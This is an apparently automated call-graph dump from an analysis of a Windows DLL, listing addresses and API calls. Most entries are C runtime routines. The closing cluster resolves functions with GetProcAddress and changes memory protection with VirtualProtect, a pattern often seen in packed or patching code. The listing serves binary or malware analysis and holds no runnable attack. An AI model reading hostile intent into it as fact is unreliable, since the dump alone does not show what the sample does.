6475->6476 6477 22792ada _ValidateLocalCookies 5 API calls 6476->6477 6478 22792625 6477->6478 6478->6467 6480 2279397d 6479->6480 6482 2279353c 6479->6482 6481 22793987 RtlDeleteCriticalSection 6480->6481 6481->6481 6481->6482 6483 22793c50 6482->6483 6484 22793c7f 6483->6484 6486 22793c59 6483->6486 6484->6469 6485 22793c69 FreeLibrary 6485->6486 6486->6484 6486->6485 7288 22795348 7289 22793529 ___vcrt_uninitialize 8 API calls 7288->7289 7290 2279534f 7289->7290 7291 22797b48 7301 22798ebf 7291->7301 7295 22797b55 7314 2279907c 7295->7314 7298 22797b7f 7299 2279571e _free 20 API calls 7298->7299 7300 22797b8a 7299->7300 7318 22798ec8 7301->7318 7303 22797b50 7304 22798fdc 7303->7304 7305 22798fe8 ___DestructExceptionObject 7304->7305 7338 22795671 RtlEnterCriticalSection 7305->7338 7307 2279905e 7352 22799073 7307->7352 7309 22799032 RtlDeleteCriticalSection 7310 2279571e _free 20 API calls 7309->7310 7312 22798ff3 7310->7312 7312->7307 7312->7309 7339 2279a09c 7312->7339 7313 2279906a _abort 7313->7295 7315 22799092 7314->7315 7316 22797b64 RtlDeleteCriticalSection 7314->7316 7315->7316 7317 2279571e _free 20 API calls 7315->7317 7316->7295 7316->7298 7317->7316 7319 22798ed4 ___DestructExceptionObject 7318->7319 7328 22795671 RtlEnterCriticalSection 7319->7328 7321 22798f77 7333 22798f97 7321->7333 7324 22798f83 _abort 7324->7303 7326 22798e78 66 API calls 7327 22798ee3 7326->7327 7327->7321 7327->7326 7329 22797b94 RtlEnterCriticalSection 7327->7329 7330 22798f6d 7327->7330 7328->7327 7329->7327 7336 22797ba8 RtlLeaveCriticalSection 7330->7336 7332 22798f75 7332->7327 7337 227956b9 RtlLeaveCriticalSection 7333->7337 7335 22798f9e 7335->7324 7336->7332 7337->7335 7338->7312 7340 2279a0a8 ___DestructExceptionObject 7339->7340 7341 2279a0b9 7340->7341 7342 2279a0ce 7340->7342 7343 22796368 __dosmaperr 20 API calls 7341->7343 7351 2279a0c9 _abort 7342->7351 7355 22797b94 RtlEnterCriticalSection 7342->7355 7344 2279a0be 7343->7344 7346 227962ac _abort 26 API calls 7344->7346 7346->7351 7347 2279a0ea 7356 2279a026 7347->7356 7349 2279a0f5 7372 2279a112 7349->7372 7351->7312 7620 227956b9 RtlLeaveCriticalSection 7352->7620 7354 2279907a 7354->7313 7355->7347 7357 2279a048 7356->7357 7358 2279a033 7356->7358 7363 2279a043 7357->7363 7375 22798e12 7357->7375 7359 22796368 __dosmaperr 20 API calls 7358->7359 7360 2279a038 7359->7360 7362 227962ac _abort 26 API calls 7360->7362 7362->7363 7363->7349 7365 2279907c 20 API calls 7366 2279a064 7365->7366 7381 22797a5a 7366->7381 7368 2279a06a 7388 2279adce 7368->7388 7371 2279571e _free 20 API calls 7371->7363 7619 22797ba8 RtlLeaveCriticalSection 7372->7619 7374 2279a11a 7374->7351 7376 22798e2a 7375->7376 7377 22798e26 7375->7377 7376->7377 7378 22797a5a 26 API calls 7376->7378 7377->7365 7379 22798e4a 7378->7379 7403 22799a22 7379->7403 7382 22797a7b 7381->7382 7383 22797a66 7381->7383 7382->7368 7384 22796368 __dosmaperr 20 API calls 7383->7384 7385 22797a6b 7384->7385 7386 227962ac _abort 26 API calls 7385->7386 7387 22797a76 7386->7387 7387->7368 7389 2279addd 7388->7389 7392 2279adf2 7388->7392 7390 22796355 __dosmaperr 20 API calls 7389->7390 7394 2279ade2 7390->7394 7391 2279ae2d 7393 22796355 __dosmaperr 20 API calls 7391->7393 7392->7391 7395 2279ae19 7392->7395 7396 2279ae32 7393->7396 7397 22796368 __dosmaperr 20 API calls 7394->7397 7576 2279ada6 7395->7576 7399 22796368 __dosmaperr 20 API calls 7396->7399 7400 2279a070 7397->7400 7401 2279ae3a 7399->7401 7400->7363 7400->7371 7402 227962ac _abort 26 API calls 7401->7402 7402->7400 7404 22799a2e ___DestructExceptionObject 7403->7404 7405 22799a4e 7404->7405 7406 22799a36 7404->7406 7408 22799aec 7405->7408 7413 22799a83 7405->7413 7428 22796355 7406->7428 7410 22796355 __dosmaperr 20 API calls 7408->7410 7412 22799af1 7410->7412 7411 22796368 __dosmaperr 20 API calls 7425 22799a43 _abort 7411->7425 7414 22796368 __dosmaperr 20 API calls 7412->7414 7431 22798c7b RtlEnterCriticalSection 7413->7431 7416 22799af9 7414->7416 7418 227962ac _abort 26 API calls 7416->7418 7417 22799a89 7419 22799aba 7417->7419 7420 22799aa5 7417->7420 7418->7425 7432 22799b0d 7419->7432 7422 22796368 __dosmaperr 20 API calls 7420->7422 7424 22799aaa 7422->7424 7423 22799ab5 7483 22799ae4 7423->7483 7426 22796355 __dosmaperr 20 API calls 7424->7426 7425->7377 7426->7423 7429 22795b7a __dosmaperr 20 API calls 7428->7429 7430 2279635a 7429->7430 7430->7411 7431->7417 7433 22799b3b 7432->7433 7470 22799b34 7432->7470 7434 22799b3f 7433->7434 7435 22799b5e 7433->7435 7436 22796355 __dosmaperr 20 API calls 7434->7436 7439 22799baf 7435->7439 7440 22799b92 7435->7440 7438 22799b44 7436->7438 7437 22792ada _ValidateLocalCookies 5 API calls 7441 22799d15 7437->7441 7442 22796368 __dosmaperr 20 API calls 7438->7442 7449 22799bc5 7439->7449 7486 2279a00b 7439->7486 7443 22796355 __dosmaperr 20 API calls 7440->7443 7441->7423 7444 22799b4b 7442->7444 7447 22799b97 7443->7447 7448 227962ac _abort 26 API calls 7444->7448 7451 22796368 __dosmaperr 20 API calls 7447->7451 7448->7470 7489 227996b2 7449->7489 7452 22799b9f 7451->7452 7455 227962ac _abort 26 API calls 7452->7455 7453 22799c0c 7456 22799c20 7453->7456 7457 22799c66 WriteFile 7453->7457 7454 22799bd3 7458 22799bf9 7454->7458 7459 22799bd7 7454->7459 7455->7470 7462 22799c28 7456->7462 7463 22799c56 7456->7463 7460 22799c89 GetLastError 7457->7460 7465 22799bef 7457->7465 7501 22799492 GetConsoleCP 7458->7501 7464 22799ccd 7459->7464 7496 22799645 7459->7496 7460->7465 7466 22799c2d 7462->7466 7467 22799c46 7462->7467 7527 22799728 7463->7527 7464->7470 7471 22796368 __dosmaperr 20 API calls 7464->7471 7465->7464 7465->7470 7474 22799ca9 7465->7474 7466->7464 7512 22799807 7466->7512 7519 227998f5 7467->7519 7470->7437 7473 22799cf2 7471->7473 7476 22796355 __dosmaperr 20 API calls 7473->7476 7477 22799cb0 7474->7477 7478 22799cc4 7474->7478 7476->7470 7479 22796368 __dosmaperr 20 API calls 7477->7479 7534 22796332 7478->7534 7481 22799cb5 7479->7481 7482 22796355 __dosmaperr 20 API calls 7481->7482 7482->7470 7575 22798c9e RtlLeaveCriticalSection 7483->7575 7485 22799aea 7485->7425 7539 22799f8d 7486->7539 7561 22798dbc 7489->7561 7491 227996c2 7492 227996c7 7491->7492 7493 22795af6 _abort 38 API calls 7491->7493 7492->7453 7492->7454 7494 227996ea 7493->7494 7494->7492 7495 22799708 GetConsoleMode 7494->7495 7495->7492 7497 2279969f 7496->7497 7498 2279966a 7496->7498 7497->7465 7498->7497 7499 2279a181 WriteConsoleW CreateFileW 7498->7499 7500 227996a1 GetLastError 7498->7500 7499->7498 7500->7497 7502 227994f5 7501->7502 7511 22799607 7501->7511 7506 2279957b WideCharToMultiByte 7502->7506 7508 227979e6 40 API calls __fassign 7502->7508 7510 227995d2 WriteFile 7502->7510 7502->7511 7570 22797c19 7502->7570 7503 22792ada _ValidateLocalCookies 5 API calls 7505 22799641 7503->7505 7505->7465 7507 227995a1 WriteFile 7506->7507 7506->7511 7507->7502 7509 2279962a GetLastError 7507->7509 7508->7502 7509->7511 7510->7502 7510->7509 7511->7503 7513 22799816 7512->7513 7514 227998d8 7513->7514 7516 22799894 WriteFile 7513->7516 7515 22792ada _ValidateLocalCookies 5 API calls 7514->7515 7517 227998f1 7515->7517 7516->7513 7518 227998da GetLastError 7516->7518 7517->7465 7518->7514 7526 22799904 7519->7526 7520 22799a0f 7521 22792ada _ValidateLocalCookies 5 API calls 7520->7521 7522 22799a1e 7521->7522 7522->7465 7523 22799986 WideCharToMultiByte 7524 227999bb WriteFile 7523->7524 7525 22799a07 GetLastError 7523->7525 7524->7525 7524->7526 7525->7520 7526->7520 7526->7523 7526->7524 7531 22799737 7527->7531 7528 227997ea 7530 22792ada _ValidateLocalCookies 5 API calls 7528->7530 7529 227997a9 WriteFile 7529->7531 7532 227997ec GetLastError 7529->7532 7533 22799803 7530->7533 7531->7528 7531->7529 7532->7528 7533->7465 7535 22796355 __dosmaperr 20 API calls 7534->7535 7536 2279633d __dosmaperr 7535->7536 7537 22796368 __dosmaperr 20 API calls 7536->7537 7538 22796350 7537->7538 7538->7470 7548 22798d52 7539->7548 7541 22799f9f 7542 22799fb8 SetFilePointerEx 7541->7542 7543 22799fa7 7541->7543 7545 22799fac 7542->7545 7546 22799fd0 GetLastError 7542->7546 7544 22796368 __dosmaperr 20 API calls 7543->7544 7544->7545 7545->7449 7547 22796332 __dosmaperr 20 API calls 7546->7547 7547->7545 7549 22798d5f 7548->7549 7551 22798d74 7548->7551 7550 22796355 __dosmaperr 20 API calls 7549->7550 7552 22798d64 7550->7552 7553 22796355 __dosmaperr 20 API calls 7551->7553 7555 22798d99 7551->7555 7554 22796368 __dosmaperr 20 API calls 7552->7554 7556 22798da4 7553->7556 7557 22798d6c 7554->7557 7555->7541 7558 22796368 __dosmaperr 20 API calls 7556->7558 7557->7541 7559 22798dac 7558->7559 7560 227962ac _abort 26 API calls 7559->7560 7560->7557 7562 22798dc9 7561->7562 7563 22798dd6 7561->7563 7564 22796368 __dosmaperr 20 API calls 7562->7564 7565 22798de2 7563->7565 7566 22796368 __dosmaperr 20 API calls 7563->7566 7567 22798dce 7564->7567 7565->7491 7568 22798e03 7566->7568 7567->7491 7569 227962ac _abort 26 API calls 7568->7569 7569->7567 7571 22795af6 _abort 38 API calls 7570->7571 7572 22797c24 7571->7572 7573 22797a00 __fassign 38 API calls 7572->7573 7574 22797c34 7573->7574 7574->7502 7575->7485 7579 2279ad24 7576->7579 7578 2279adca 7578->7400 7580 2279ad30 ___DestructExceptionObject 7579->7580 7590 22798c7b RtlEnterCriticalSection 7580->7590 7582 2279ad3e 7583 2279ad70 7582->7583 7584 2279ad65 7582->7584 7586 22796368 __dosmaperr 20 API calls 7583->7586 7591 2279ae4d 7584->7591 7587 2279ad6b 7586->7587 7606 2279ad9a 7587->7606 7589 2279ad8d _abort 7589->7578 7590->7582 7592 22798d52 26 API calls 7591->7592 7595 2279ae5d 7592->7595 7593 2279ae63 7609 22798cc1 7593->7609 7595->7593 7598 22798d52 26 API calls 7595->7598 7605 2279ae95 7595->7605 7596 22798d52 26 API calls 7599 2279aea1 CloseHandle 7596->7599 7600 2279ae8c 7598->7600 7599->7593 7601 2279aead GetLastError 7599->7601 7604 22798d52 26 API calls 7600->7604 7601->7593 7602 22796332 __dosmaperr 20 API calls 7603 2279aedd 7602->7603 7603->7587 7604->7605 7605->7593 7605->7596 7618 22798c9e RtlLeaveCriticalSection 7606->7618 7608 2279ada4 7608->7589 7610 22798d37 7609->7610 7613 22798cd0 7609->7613 7611 22796368 __dosmaperr 20 API calls 7610->7611 7612 22798d3c 7611->7612 7614 22796355 __dosmaperr 20 API calls 7612->7614 7613->7610 7617 22798cfa 7613->7617 7615 22798d27 7614->7615 7615->7602 7615->7603 7616 22798d21 SetStdHandle 7616->7615 7617->7615 7617->7616 7618->7608 7619->7374 7620->7354 6487 2279284f 6490 22792882 6487->6490 6493 22793550 6490->6493 6492 2279285d 6494 2279355d 6493->6494 6497 2279358a 6493->6497 6495 227947e5 ___std_exception_copy 21 API calls 6494->6495 6494->6497 6496 2279357a 6495->6496 6496->6497 6499 2279544d 6496->6499 6497->6492 6500 22795468 6499->6500 6501 2279545a 6499->6501 6502 22796368 __dosmaperr 20 API calls 6500->6502 6501->6500 6503 2279547f 6501->6503 6507 22795470 6502->6507 6505 2279547a 6503->6505 6506 22796368 __dosmaperr 20 API calls 6503->6506 6505->6497 6506->6507 6508 227962ac 6507->6508 6511 22796231 6508->6511 6510 227962b8 6510->6505 6512 22795b7a __dosmaperr 20 API calls 6511->6512 6513 22796247 6512->6513 6514 22796255 6513->6514 6515 227962a6 6513->6515 6519 22792ada _ValidateLocalCookies 5 API calls 6514->6519 6522 227962bc IsProcessorFeaturePresent 6515->6522 6517 227962ab 6518 22796231 _abort 26 API calls 6517->6518 6520 227962b8 6518->6520 6521 2279627c 6519->6521 6520->6510 6521->6510 6523 227962c7 6522->6523 6526 227960e2 6523->6526 6527 227960fe ___scrt_fastfail 6526->6527 6528 2279612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6527->6528 6531 227961fb ___scrt_fastfail 6528->6531 6529 22792ada _ValidateLocalCookies 5 API calls 6530 22796219 GetCurrentProcess TerminateProcess 6529->6530 6530->6517 6531->6529 6532 2279724e GetProcessHeap 6533 22798640 6536 22798657 6533->6536 6537 22798679 6536->6537 6538 22798665 6536->6538 6540 22798681 6537->6540 6541 22798693 6537->6541 6539 22796368 __dosmaperr 20 API calls 6538->6539 6542 2279866a 6539->6542 6543 22796368 __dosmaperr 20 API calls 6540->6543 6548 22798652 6541->6548 6549 227954a7 6541->6549 6546 227962ac _abort 26 API calls 6542->6546 6544 22798686 6543->6544 6547 227962ac _abort 26 API calls 6544->6547 6546->6548 6547->6548 6550 227954ba 6549->6550 6551 227954c4 6549->6551 6550->6548 6551->6550 6557 22795af6 GetLastError 6551->6557 6553 227954e5 6577 22797a00 6553->6577 6558 22795b12 6557->6558 6559 22795b0c 6557->6559 6561 2279637b _abort 20 API calls 6558->6561 6563 22795b61 SetLastError 6558->6563 6560 22795e08 _abort 11 API calls 6559->6560 6560->6558 6562 22795b24 6561->6562 6564 22795b2c 6562->6564 6565 22795e5e _abort 11 API calls 6562->6565 6563->6553 6566 2279571e _free 20 API calls 6564->6566 6567 22795b41 6565->6567 6568 22795b32 6566->6568 6567->6564 6569 22795b48 6567->6569 6570 22795b6d SetLastError 6568->6570 6571 2279593c _abort 20 API calls 6569->6571 6585 227955a8 6570->6585 6572 22795b53 6571->6572 6575 2279571e _free 20 API calls 6572->6575 6576 22795b5a 6575->6576 6576->6563 6576->6570 6578 227954fe 6577->6578 6579 22797a13 6577->6579 6581 22797a2d 6578->6581 6579->6578 6653 22797f0f 6579->6653 6582 22797a40 6581->6582 6583 22797a55 6581->6583 6582->6583 6788 22796d7e 6582->6788 6583->6550 6596 22797613 6585->6596 6587 227955b8 6589 227955e0 6587->6589 6590 227955c2 IsProcessorFeaturePresent 6587->6590 6626 22794bc1 6589->6626 6592 227955cd 6590->6592 6594 227960e2 _abort 8 API calls 6592->6594 6594->6589 6629 22797581 6596->6629 6599 2279766e 6600 2279767a _abort 6599->6600 6601 22795b7a __dosmaperr 20 API calls 6600->6601 6604 227976a7 _abort 6600->6604 6607 227976a1 _abort 6600->6607 6601->6607 6602 227976f3 6603 22796368 __dosmaperr 20 API calls 6602->6603 6605 227976f8 6603->6605 6611 2279771f 6604->6611 6643 22795671 RtlEnterCriticalSection 6604->6643 6608 227962ac _abort 26 API calls 6605->6608 6606 2279bdc9 _abort 5 API calls 6609 22797875 6606->6609 6607->6602 6607->6604 6625 227976d6 6607->6625 6608->6625 6609->6587 6612 2279777e 6611->6612 6614 22797776 6611->6614 6622 227977a9 6611->6622 6644 227956b9 RtlLeaveCriticalSection 6611->6644 6612->6622 6645 22797665 6612->6645 6617 22794bc1 _abort 28 API calls 6614->6617 6617->6612 6620 22795af6 _abort 38 API calls 6623 2279780c 6620->6623 6621 22797665 _abort 38 API calls 6621->6622 6648 2279782e 6622->6648 6624 22795af6 _abort 38 API calls 6623->6624 6623->6625 6624->6625 6625->6606 6627 2279499b _abort 28 API calls 6626->6627 6628 22794bd2 6627->6628 6632 22797527 6629->6632 6631 227955ad 6631->6587 6631->6599 6633 22797533 ___DestructExceptionObject 6632->6633 6638 22795671 RtlEnterCriticalSection 6633->6638 6635 22797541 6639 22797575 6635->6639 6637 22797568 _abort 6637->6631 6638->6635 6642 227956b9 RtlLeaveCriticalSection 6639->6642 6641 2279757f 6641->6637 6642->6641 6643->6611 6644->6614 6646 22795af6 _abort 38 API calls 6645->6646 6647 2279766a 6646->6647 6647->6621 6649 227977fd 6648->6649 6650 22797834 6648->6650 6649->6620 6649->6623 6649->6625 6652 227956b9 RtlLeaveCriticalSection 6650->6652 6652->6649 6654 22797f1b ___DestructExceptionObject 6653->6654 6655 22795af6 _abort 38 API calls 6654->6655 6656 22797f24 6655->6656 6657 22797f72 _abort 6656->6657 6665 22795671 RtlEnterCriticalSection 6656->6665 6657->6578 6659 22797f42 6666 22797f86 6659->6666 6664 227955a8 _abort 38 API calls 6664->6657 6665->6659 6667 22797f94 __fassign 6666->6667 6669 22797f56 6666->6669 6667->6669 6673 22797cc2 6667->6673 6670 22797f75 6669->6670 6787 227956b9 RtlLeaveCriticalSection 6670->6787 6672 22797f69 6672->6657 6672->6664 6675 22797d42 6673->6675 6676 22797cd8 6673->6676 6678 2279571e _free 20 API calls 6675->6678 6700 22797d90 6675->6700 6676->6675 6682 2279571e _free 20 API calls 6676->6682 6683 22797d0b 6676->6683 6677 22797d9e 6688 22797dfe 6677->6688 6697 2279571e 20 API calls _free 6677->6697 6679 22797d64 6678->6679 6680 2279571e _free 20 API calls 6679->6680 6684 22797d77 6680->6684 6681 2279571e _free 20 API calls 6687 22797d37 6681->6687 6689 22797d00 6682->6689 6685 2279571e _free 20 API calls 6683->6685 6699 22797d2d 6683->6699 6686 2279571e _free 20 API calls 6684->6686 6690 22797d22 6685->6690 6691 22797d85 6686->6691 6692 2279571e _free 20 API calls 6687->6692 6693 2279571e _free 20 API calls 6688->6693 6701 227990ba 6689->6701 6729 227991b8 6690->6729 6696 2279571e _free 20 API calls 6691->6696 6692->6675 6698 22797e04 6693->6698 6696->6700 6697->6677 6698->6669 6699->6681 6741 22797e35 6700->6741 6702 227990cb 6701->6702 6728 227991b4 6701->6728 6703 227990dc 6702->6703 6705 2279571e _free 20 API calls 6702->6705 6704 227990ee 6703->6704 6706 2279571e _free 20 API calls 6703->6706 6707 22799100 6704->6707 6708 2279571e _free 20 API calls 6704->6708 6705->6703 6706->6704 6709 22799112 6707->6709 6710 2279571e _free 20 API calls 6707->6710 6708->6707 6711 22799124 6709->6711 6713 2279571e _free 20 API calls 6709->6713 6710->6709 6712 22799136 6711->6712 6714 2279571e _free 20 API calls 6711->6714 6715 22799148 6712->6715 6716 2279571e _free 20 API calls 6712->6716 6713->6711 6714->6712 6717 2279915a 6715->6717 6718 2279571e _free 20 API calls 6715->6718 6716->6715 6719 2279916c 6717->6719 6721 2279571e _free 20 API calls 6717->6721 6718->6717 6720 2279917e 6719->6720 6722 2279571e _free 20 API calls 6719->6722 6723 22799190 6720->6723 6724 2279571e _free 20 API calls 6720->6724 6721->6719 6722->6720 6725 227991a2 6723->6725 6726 2279571e _free 20 API calls 6723->6726 6724->6723 6727 2279571e _free 20 API calls 6725->6727 6725->6728 6726->6725 6727->6728 6728->6683 6730 2279921d 6729->6730 6731 227991c5 6729->6731 6730->6699 6732 227991d5 6731->6732 6733 2279571e _free 20 API calls 6731->6733 6734 227991e7 6732->6734 6735 2279571e _free 20 API calls 6732->6735 6733->6732 6736 227991f9 6734->6736 6737 2279571e _free 20 API calls 6734->6737 6735->6734 6738 2279920b 6736->6738 6739 2279571e _free 20 API calls 6736->6739 6737->6736 6738->6730 6740 2279571e _free 20 API calls 6738->6740 6739->6738 6740->6730 6742 22797e42 6741->6742 6746 22797e60 6741->6746 6742->6746 6747 2279925d 6742->6747 6745 2279571e _free 20 API calls 6745->6746 6746->6677 6748 22797e5a 6747->6748 6749 2279926e 6747->6749 6748->6745 6783 22799221 6749->6783 6752 22799221 __fassign 20 API calls 6753 22799281 6752->6753 6754 22799221 __fassign 20 API calls 6753->6754 6755 2279928c 6754->6755 6756 22799221 __fassign 20 API calls 6755->6756 6757 22799297 6756->6757 6758 22799221 __fassign 20 API calls 6757->6758 6759 227992a5 6758->6759 6760 2279571e _free 20 API calls 6759->6760 6761 227992b0 6760->6761 6762 2279571e _free 20 API calls 6761->6762 6763 227992bb 6762->6763 6764 2279571e _free 20 API calls 6763->6764 6765 227992c6 6764->6765 6766 22799221 __fassign 20 API calls 6765->6766 6767 227992d4 6766->6767 6768 22799221 __fassign 20 API calls 6767->6768 6769 227992e2 6768->6769 6770 22799221 __fassign 20 API calls 6769->6770 6771 227992f3 6770->6771 6772 22799221 __fassign 20 API calls 6771->6772 6773 22799301 6772->6773 6774 22799221 __fassign 20 API calls 6773->6774 6775 2279930f 6774->6775 6776 2279571e _free 20 API calls 6775->6776 6777 2279931a 6776->6777 6778 2279571e _free 20 API calls 6777->6778 6779 22799325 6778->6779 6780 2279571e _free 20 API calls 6779->6780 6781 22799330 6780->6781 6782 2279571e _free 20 API calls 6781->6782 6782->6748 6784 22799258 6783->6784 6785 22799248 6783->6785 6784->6752 6785->6784 6786 2279571e _free 20 API calls 6785->6786 6786->6785 6787->6672 6789 22796d8a ___DestructExceptionObject 6788->6789 6790 22795af6 _abort 38 API calls 6789->6790 6795 22796d94 6790->6795 6792 22796e18 _abort 6792->6583 6794 227955a8 _abort 38 API calls 6794->6795 6795->6792 6795->6794 6796 2279571e _free 20 API calls 6795->6796 6797 22795671 RtlEnterCriticalSection 6795->6797 6798 22796e0f 6795->6798 6796->6795 6797->6795 6801 227956b9 RtlLeaveCriticalSection 6798->6801 6800 22796e16 6800->6795 6801->6800 7621 2279af43 7622 2279af59 7621->7622 7623 2279af4d 7621->7623 7623->7622 7624 2279af52 CloseHandle 7623->7624 7624->7622 7625 2279a945 7627 2279a96d 7625->7627 7626 2279a9a5 7627->7626 7628 2279a99e 7627->7628 7629 2279a997 7627->7629 7638 2279aa00 7628->7638 7634 2279aa17 7629->7634 7635 2279aa20 7634->7635 7642 2279b19b 7635->7642 7639 2279aa20 7638->7639 7640 2279b19b __startOneArgErrorHandling 21 API calls 7639->7640 7641 2279a9a3 7640->7641 7643 2279b1da __startOneArgErrorHandling 7642->7643 7645 2279b25c __startOneArgErrorHandling 7643->7645 7652 2279b59e 7643->7652 7649 227978a3 __startOneArgErrorHandling 5 API calls 7645->7649 7651 2279b286 7645->7651 7646 2279b8b2 __startOneArgErrorHandling 20 API calls 7647 2279b292 7646->7647 7648 22792ada _ValidateLocalCookies 5 API calls 7647->7648 7650 2279a99c 7648->7650 7649->7651 7651->7646 7651->7647 7653 2279b5c1 __raise_exc RaiseException 7652->7653 7654 2279b5bc 7653->7654 7654->7645 7936 22797bc7 7937 22797bd3 ___DestructExceptionObject 7936->7937 7939 22797c0a _abort 7937->7939 7944 22795671 RtlEnterCriticalSection 7937->7944 7940 22797be7 7941 22797f86 __fassign 20 API calls 7940->7941 7942 22797bf7 7941->7942 7945 22797c10 7942->7945 7944->7940 7948 227956b9 RtlLeaveCriticalSection 7945->7948 7947 22797c17 7947->7939 7948->7947 7949 2279a1c6 IsProcessorFeaturePresent 7950 22799db8 7951 22799dbf 7950->7951 7952 22799e20 7951->7952 7956 22799ddf 7951->7956 7953 2279aa17 21 API calls 7952->7953 7954 2279a90e 7952->7954 7955 22799e6e 7953->7955 7956->7954 7957 2279aa17 21 API calls 7956->7957 7958 2279a93e 7957->7958 6802 2279543d 6803 22795440 6802->6803 6804 227955a8 _abort 38 API calls 6803->6804 6805 2279544c 6804->6805 7655 22791f3f 7656 22791f4b ___DestructExceptionObject 7655->7656 7673 2279247c 7656->7673 7658 22791f52 7659 22791f7c 7658->7659 7660 22792041 7658->7660 7667 22791f57 ___scrt_is_nonwritable_in_current_image 7658->7667 7684 227923de 7659->7684 7662 22792639 ___scrt_fastfail 4 API calls 7660->7662 7663 22792048 7662->7663 7664 22791f8b __RTC_Initialize 7664->7667 7687 227922fc RtlInitializeSListHead 7664->7687 7666 22791f99 ___scrt_initialize_default_local_stdio_options 7688 227946c5 7666->7688 7671 22791fb8 7671->7667 7672 22794669 _abort 5 API calls 7671->7672 7672->7667 7674 22792485 7673->7674 7696 22792933 IsProcessorFeaturePresent 7674->7696 7678 22792496 7683 2279249a 7678->7683 7707 227953c8 7678->7707 7681 227924b1 7681->7658 7682 22793529 ___vcrt_uninitialize 8 API calls 7682->7683 7683->7658 7738 227924b5 7684->7738 7686 227923e5 7686->7664 7687->7666 7689 227946dc 7688->7689 7690 22792ada _ValidateLocalCookies 5 API calls 7689->7690 7691 22791fad 7690->7691 7691->7667 7692 227923b3 7691->7692 7693 227923b8 ___scrt_release_startup_lock 7692->7693 7694 22792933 ___isa_available_init IsProcessorFeaturePresent 7693->7694 7695 227923c1 7693->7695 7694->7695 7695->7671 7697 22792491 7696->7697 7698 227934ea 7697->7698 7699 227934ef ___vcrt_initialize_winapi_thunks 7698->7699 7710 22793936 7699->7710 7702 227934fd 7702->7678 7704 22793505 7705 22793510 7704->7705 7706 22793972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7704->7706 7705->7678 7706->7702 7734 22797457 7707->7734 7711 2279393f 7710->7711 7713 22793968 7711->7713 7714 227934f9 7711->7714 7724 22793be0 7711->7724 7715 22793972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7713->7715 7714->7702 7716 227938e8 7714->7716 7715->7714 7729 22793af1 7716->7729 7719 227938fd 7719->7704 7720 22793ba2 ___vcrt_FlsSetValue 6 API calls 7721 2279390b 7720->7721 7722 22793918 7721->7722 7723 2279391b ___vcrt_uninitialize_ptd 6 API calls 7721->7723 7722->7704 7723->7719 7725 22793a82 try_get_function 5 API calls 7724->7725 7726 22793bfa 7725->7726 7727 22793c18 InitializeCriticalSectionAndSpinCount 7726->7727 7728 22793c03 7726->7728 7727->7728 7728->7711 7730 22793a82 try_get_function 5 API calls 7729->7730 7731 22793b0b 7730->7731 7732 22793b24 TlsAlloc 7731->7732 7733 227938f2 7731->7733 7733->7719 7733->7720 7737 22797470 7734->7737 7735 22792ada _ValidateLocalCookies 5 API calls 7736 227924a3 7735->7736 7736->7681 7736->7682 7737->7735 7739 227924c4 7738->7739 7740 227924c8 7738->7740 7739->7686 7741 22792639 ___scrt_fastfail 4 API calls 7740->7741 7743 227924d5 ___scrt_release_startup_lock 7740->7743 7742 22792559 7741->7742 7743->7686 6806 22795630 6807 2279563b 6806->6807 6809 22795664 6807->6809 6810 22795660 6807->6810 6812 22795eb7 6807->6812 6819 22795688 6809->6819 6813 22795c45 _abort 5 API calls 6812->6813 6814 22795ede 6813->6814 6815 22795efc InitializeCriticalSectionAndSpinCount 6814->6815 6816 22795ee7 6814->6816 6815->6816 6817 22792ada _ValidateLocalCookies 5 API calls 6816->6817 6818 22795f13 6817->6818 6818->6807 6820 227956b4 6819->6820 6821 22795695 6819->6821 6820->6810 6822 2279569f RtlDeleteCriticalSection 6821->6822 6822->6820 6822->6822 7225 22793eb3 7228 22795411 7225->7228 7229 2279541d _abort 7228->7229 7230 22795af6 _abort 38 API calls 7229->7230 7231 22795422 7230->7231 7232 227955a8 _abort 38 API calls 7231->7232 7233 2279544c 7232->7233 6823 2279742b 6824 22797430 6823->6824 6825 22797453 6824->6825 6827 22798bae 6824->6827 6828 22798bbb 6827->6828 6829 22798bdd 6827->6829 6830 22798bc9 RtlDeleteCriticalSection 6828->6830 6831 22798bd7 6828->6831 6829->6824 6830->6830 6830->6831 6832 2279571e _free 20 API calls 6831->6832 6832->6829 7234 227960ac 7235 227960dd 7234->7235 7236 227960b7 7234->7236 7236->7235 7237 227960c7 FreeLibrary 7236->7237 7237->7236 7959 227921a1 ___scrt_dllmain_exception_filter 7960 227981a0 7961 227981d9 7960->7961 7962 227981dd 7961->7962 7973 22798205 7961->7973 7963 22796368 __dosmaperr 20 API calls 7962->7963 7964 227981e2 7963->7964 7966 227962ac _abort 26 API calls 7964->7966 7965 22798529 7967 22792ada _ValidateLocalCookies 5 API calls 7965->7967 7968 227981ed 7966->7968 7969 22798536 7967->7969 7970 22792ada _ValidateLocalCookies 5 API calls 7968->7970 7972 227981f9 7970->7972 7973->7965 7974 227980c0 7973->7974 7977 227980db 7974->7977 7975 22792ada _ValidateLocalCookies 5 API calls 7976 22798152 7975->7976 7976->7973 7977->7975 6197 2279c7a7 6198 2279c7be 6197->6198 6207 2279c82c 6197->6207 6198->6207 6209 2279c7e6 GetModuleHandleA 6198->6209 6199 2279c872 6200 2279c835 GetModuleHandleA 6202 2279c83f 6200->6202 6202->6202 6204 2279c85f GetProcAddress 6202->6204 6202->6207 6203 2279c7dd 6203->6202 6205 2279c800 GetProcAddress 6203->6205 6203->6207 6204->6207 6206 2279c80d VirtualProtect 6205->6206 6205->6207 6206->6207 6208 2279c81c VirtualProtect 6206->6208 6207->6199 6207->6200 6207->6202 6208->6207 6210 2279c7ef 6209->6210 6216 2279c82c 6209->6216 6221 2279c803 GetProcAddress 6210->6221 6212 2279c872 6213 2279c835 GetModuleHandleA 6218 2279c83f 6213->6218 6214 2279c7f4 6215 2279c800 GetProcAddress 6214->6215 6214->6216 6215->6216 6217 2279c80d VirtualProtect 6215->6217 6216->6212 6216->6213 6216->6218 6217->6216 6219 2279c81c VirtualProtect 6217->6219 6218->6216 6220 2279c85f GetProcAddress 6218->6220 6219->6216 6220->6216 6222 2279c82c 6221->6222 6223 2279c80d VirtualProtect 6221->6223 6225 2279c835 GetModuleHandleA 6222->6225 6226 2279c872 6222->6226 6223->6222 6224 2279c81c VirtualProtect 6223->6224 6224->6222 6228 2279c83f 6225->6228 6227 2279c85f GetProcAddress 6227->6228 6228->6222 6228->6227 6833 22792418 6834 22792420 ___scrt_release_startup_lock 6833->6834 6837 227947f5 